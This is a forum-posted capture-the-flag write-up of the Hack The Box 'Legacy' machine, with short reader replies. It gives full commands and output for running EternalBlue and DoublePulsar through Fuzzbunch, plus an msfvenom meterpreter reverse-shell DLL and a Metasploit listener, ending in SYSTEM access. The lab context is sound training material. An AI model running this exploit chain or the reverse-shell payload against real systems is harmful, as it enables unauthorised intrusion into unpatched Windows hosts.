Legacy write-up by Alamot (using fuzzbunch)

Enumeration

Port scanning

> sudo nmap -A 10.10.10.4

Nmap scan report for 10.10.10.4
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003|PocketPC/CE (91%)
OS CPE: cpe:/o:microsoft:windows_2000 cpe:/o:microsoft:windows_xp 
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:aa:ea:dc (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Exploitation

Installing Fuzzbunch on Linux

  • Install wine and winetricks using the package manager of your linux distro.
  • We initiate a wine32 environment (you may need to install 32-bit packages)
> WINEPREFIX="$HOME/.wine-fuzzbunch" WINEARCH=win32 wine wineboot
  • Install python26 via winetricks
> WINEPREFIX="$HOME/.wine-fuzzbunch" winetricks python26
  • Get files from git
> cd $HOME/.wine-fuzzbunch/drive_c && git clone https://github.com/mdiazcl/fuzzbunch-debian
  • I have written a little script to run fuzzbunch:
> sudo nano /usr/local/bin/fuzzbunch 
    export WINEPREFIX=$HOME/.wine-fuzzbunch
    cd $HOME/.wine-fuzzbunch/drive_c/fuzzbunch-debian/windows
    wine ../../Python26/python.exe fb.py
> sudo chmod +x /usr/local/bin/fuzzbunch

Making the shellcode payload

We need a DLL shellcode payload. You can use msfvenom to make it or anything else you like:

> cd $HOME/.wine-fuzzbunch/drive_c/
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=[INSERT_YOUR_IP_HERE] LPORT=60000 -f dll -o shell.dll

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of dll file: 5120 bytes
Saved as: shell.dll

Setting up the listener

Again, you can use whatever listener you like. Here, I use the handler from metasploit:

> msfconsole
msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST=INSERT_YOUR_IP_HERE
msf exploit(handler) > set LPORT 60000
msf exploit(handler) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on YOUR_IP_HERE:60000

Running fuzzbunch

> fuzzbunch 

[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => C:\fuzzbunch-debian\windows\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => C:\fuzzbunch-debian\logs
[*] Autorun ON

[+] Set FbStorage => C:\fuzzbunch-debian\windows\storage

[*] Retargetting Session

[?] Default Target IP Address [] : 10.10.10.4
[?] Default Callback IP Address [] : [INSERT_YOUR_IP_HERE]     
[?] Use Redirection [yes] : no

[?] Base Log directory [C:\fuzzbunch-debian\logs] : 
[*] Checking C:\fuzzbunch-debian\logs for projects
Index     Project                 
-----     -------                 
0         Create a New Project    

[?] Project [0] : 0
[?] New Project Name : LEGACY
[?] Set target log directory to 'C:\fuzzbunch-debian\logs\legacy\z10.10.10.4'? [Yes] : 

[*] Initializing Global State
[+] Set TargetIp => 10.10.10.4
[+] Set CallbackIp => [INSERT_YOUR_IP_HERE]

[!] Redirection OFF
[+] Set LogDir => C:\fuzzbunch-debian\logs\legacy\z10.10.10.4
[+] Set Project => legacy

Running EternalBlue

fb > use EternalBlue

[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.10.10.4

[*] Applying Session Parameters
[*] Running Exploit Touches

[!] Enter Prompt Mode :: Eternalblue

Module: Eternalblue
===================

[?] Prompt For Variable Settings? [Yes] : y
[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] : 
[*]  TargetIp :: Target IP Address
[?] TargetIp [10.10.10.4] : 
[*]  TargetPort :: Port used by the SMB service for exploit connection
[?] TargetPort [445] : 
[*]  VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.
[?] VerifyTarget [True] : 
[*]  VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.
[?] VerifyBackdoor [True] : 
[*]  MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3.
[?] MaxExploitAttempts [3] : 
[*]  GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.
[?] GroomAllocations [12] : 
[*]  Target :: Operating System, Service Pack, and Architecture of target OS

*-> 0) XP            Windows XP 32-Bit All Service Packs
    1) WIN72K8R2     Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

[?] Target [1] : 0
[+] Set Target => XP

[!] Preparing to Execute Eternalblue

[*]  Mode :: Delivery mechanism

    0) DANE     Forward deployment via DARINGNEOPHYTE
*-> 1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1
[+] Run Mode: FB

[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] : y
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.10.10.4] : 
[?] Destination Port [445] : 
[+] (TCP) Local 10.10.10.4:445

[+] Configure Plugin Remote Tunnels

These are our final settings for EternalBlue:

Module: Eternalblue
===================

Name                  Value                                                 
----                  -----                                                 
DaveProxyPort         0                                                     
NetworkTimeout        60                                                    
TargetIp              10.10.10.4                                            
TargetPort            445                                                   
VerifyTarget          True                                                  
VerifyBackdoor        True                                                  
MaxExploitAttempts    3                                                     
GroomAllocations      12                                                    
ShellcodeBuffer                                                             
Target                XP                                                    

Now let’s execute it:

[?] Execute Plugin? [Yes] : y    
[*] Executing Plugin
[*] Connecting to target for exploitation.
    [+] Connection established for exploitation.
[*] Pinging backdoor...
    [+] Backdoor not installed, game on.
[*] Forcing MaxExploitAttempts to 1.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (12 bytes):
0x00000000  57 69 6e 64 6f 77 73 20 35 2e 31 00              Windows 5.1.
[*] Fingerprinting SMB non-paged pool quota
    [+] Allocation total: 0xfff4
    [+] Spray size: 0
    [+] Allocation total: 0x1ffe8
    [+] Spray size: 1
    [+] Allocation total: 0x2ffdc
    [+] Spray size: 2
    [+] Allocation total: 0x3ffd0
    [+] Spray size: 3
    [+] Allocation total: 0x4ffc4
    [+] Spray size: 4
    [+] Allocation total: 0x5ffb8
    [+] Spray size: 5
    [+] Allocation total: 0x6ffac
    [+] Spray size: 6
    [+] Allocation total: 0x7ffa0
    [+] Spray size: 7
    [+] Allocation total: 0x8ff94
    [+] Spray size: 8
    [+] Allocation total: 0x9ff88
    [+] Spray size: 9
    [+] Allocation total: 0xaff7c
    [+] Spray size: 10
    [+] Allocation total: 0xbff70
    [+] Spray size: 11
    [+] Quota NOT exceeded after 12 packets
    [+] Allocation total: 0xbff70
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
    ................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
    [+] Sending 2 non-paged pool fragment packets
        ....DONE.
    [+] Sent 2 non-paged pool fragment packets ofsize 0x00006FF9
    [+] Sending 10 non-paged pool grooming packets
        ..........DONE.
    [+] Sent 10 non-paged pool grooming packets - groom complete
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
    DONE.
[*] Receiving response from exploit packet
    [+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
    [+] Backdoor returned code: 10 - Success!
    [+] Ping returned Target architecture: x86 (32-bit)
    [+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000  08 00                                            ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded

Running DoublePulsar

fb Special (Eternalblue) > use DoublePulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.10.10.4

[*] Applying Session Parameters

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name              Value                                                 
----              -----                                                 
NetworkTimeout    60                                                    
TargetIp          10.10.10.4                                            
TargetPort        445                                                   
OutputFile                                                              
Protocol          SMB                                                   
Architecture      x86                                                   
Function          OutputInstall                                         

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] : 
[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds).  Use -1 for no timeout.
[?] NetworkTimeout [60] : 
[*]  TargetIp :: Target IP Address
[?] TargetIp [10.10.10.4] : 
[*]  TargetPort :: Port used by the Double Pulsar back door
[?] TargetPort [445] : 
[*]  Protocol :: Protocol for the backdoor to speak

*-> 0) SMB     Ring 0 SMB (TCP 445) backdoor
    1) RDP     Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] : 
[*]  Architecture :: Architecture of the target OS

*-> 0) x86     x86 32-bits
    1) x64     x64 64-bits

[?] Architecture [0] : 
[*]  Function :: Operation for backdoor to perform

    0) OutputInstall     Only output the install shellcode to a binary file on disk.
    1) Ping              Test for presence of backdoor
*-> 2) RunDLL            Use an APC to inject a DLL into a user mode process.
    3) RunShellcode      Run raw shellcode
    4) Uninstall         Remove's backdoor from system

[?] Function [0] : 2
[+] Set Function => RunDLL
[*]  DllPayload :: DLL to inject into user mode
[?] DllPayload [] : 
[*]  DllPayload :: DLL to inject into user mode
[?] DllPayload [] : C:\shell.dll
[+] Set DllPayload => C:\shell.dll
[*]  DllOrdinal :: The exported ordinal number of the DLL being injected to call
[?] DllOrdinal [1] : 
[*]  ProcessName :: Name of process to inject into
[?] ProcessName [lsass.exe] : svchost.exe    
[+] Set ProcessName => svchost.exe
[*]  ProcessCommandLine :: Command line of process to inject into
[?] ProcessCommandLine [] : 

[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.10.10.4] : 
[?] Destination Port [445] : 
[+] (TCP) Local 10.10.10.4:445

[+] Configure Plugin Remote Tunnels

These are our final settings for DoublePulsar:

Module: Doublepulsar
====================

Name                  Value                                                 
----                  -----                                                 
NetworkTimeout        60                                                    
TargetIp              10.10.10.4                                            
TargetPort            445                                                   
DllPayload            C:\shell.dll                                          
DllOrdinal            1                                                     
ProcessName           svchost.exe                                           
ProcessCommandLine                                                          
Protocol              SMB                                                   
Architecture          x86                                                   
Function              RunDLL

It’s important to change the ProcessName from lsass.exe to svchost.exe !!!

[?] Execute Plugin? [Yes] : 
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
	[+] Backdoor returned code: 10 - Success!
	[+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x00811F87
    SMB Connection string is: Windows 5.1
    Target OS is: XP x86
	[+] Backdoor installed
	[+] DLL built
	[.] Sending shellcode to inject DLL
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Command completed successfully
[+] Doublepulsar Succeeded

Back to metasploit:

[*] Sending stage (179267 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM :D

Very Neat, havent used fuzzbunch before. Will have to give this a Go. Thanks for the share

very cool :+1:

Awesome! Keep it up :slight_smile: